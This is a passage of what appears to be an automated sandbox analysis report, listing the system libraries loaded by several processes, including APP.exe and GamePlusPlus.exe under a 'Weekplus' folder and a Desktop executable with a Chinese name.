Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U6c47#U8054#U652f#U4ed8.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files\Weekplus\APP.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d11.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxgi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: openvr_api.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steam_api64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: version.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: msvcp140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxgi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140_1.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: wldp.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: profapi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: wininet.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: mscoree.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: amsi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: netapi32.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dinput8.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: winmm.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: inputhost.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: coremessaging.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: propsys.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: wintypes.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: coreuicomponents.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: ntmarta.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: mswsock.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: hid.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: napinsp.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: pnrpnsp.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: wshbth.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: nlaapi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dnsapi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: winrnr.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: devobj.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: ddraw.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dciman32.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: msasn1.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d10warp.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxcore.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d11.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxgi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: openvr_api.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steam_api64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: version.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: msvcp140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxgi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140_1.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d10warp.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxcore.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d10warp.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d11.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxgi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: openvr_api.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steam_api64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: version.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: msvcp140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxgi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140_1.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d10warp.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxcore.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d10warp.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d11.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxgi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: openvr_api.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steam_api64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: version.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: msvcp140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxgi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140_1.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d10warp.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxcore.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d10warp.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d11.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxgi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: openvr_api.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steam_api64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: version.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: msvcp140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxgi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140_1.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: wldp.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: profapi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: wininet.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: mscoree.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: amsi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: netapi32.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dinput8.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: winmm.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: inputhost.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: coremessaging.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: propsys.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: wintypes.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: coreuicomponents.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: ntmarta.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: hid.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: mswsock.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: napinsp.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: pnrpnsp.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: devobj.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: wshbth.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: nlaapi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dnsapi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: winrnr.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: msasn1.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: ddraw.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dciman32.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d10warp.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxcore.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d11.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxgi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: openvr_api.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steam_api64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: version.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: msvcp140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140_1.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d10warp.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxcore.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d10warp.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d11.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxgi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: openvr_api.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steam_api64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: version.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: msvcp140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxgi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140_1.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d10warp.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxcore.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d10warp.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d11.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxgi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: openvr_api.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steam_api64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: version.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: msvcp140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxgi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140_1.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d10warp.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxcore.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d10warp.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d11.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxgi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: openvr_api.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steam_api64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: version.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: msvcp140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140_1.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: wldp.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: profapi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: wininet.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: mscoree.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: amsi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: netapi32.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dinput8.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: winmm.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: inputhost.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: coremessaging.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: propsys.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: wintypes.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: coreuicomponents.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: ntmarta.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: hid.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: mswsock.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: devobj.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: napinsp.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: pnrpnsp.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: wshbth.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: nlaapi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dnsapi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: winrnr.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: msasn1.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: ddraw.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dciman32.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d10warp.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxcore.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: d3d11.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxgi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: openvr_api.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steam_api64.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: version.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: msvcp140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: dxgi.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: vcruntime140_1.dll
Source: C:\Program Files\Weekplus\GamePlusPlus.exe	Section loaded: steamclient64.dll
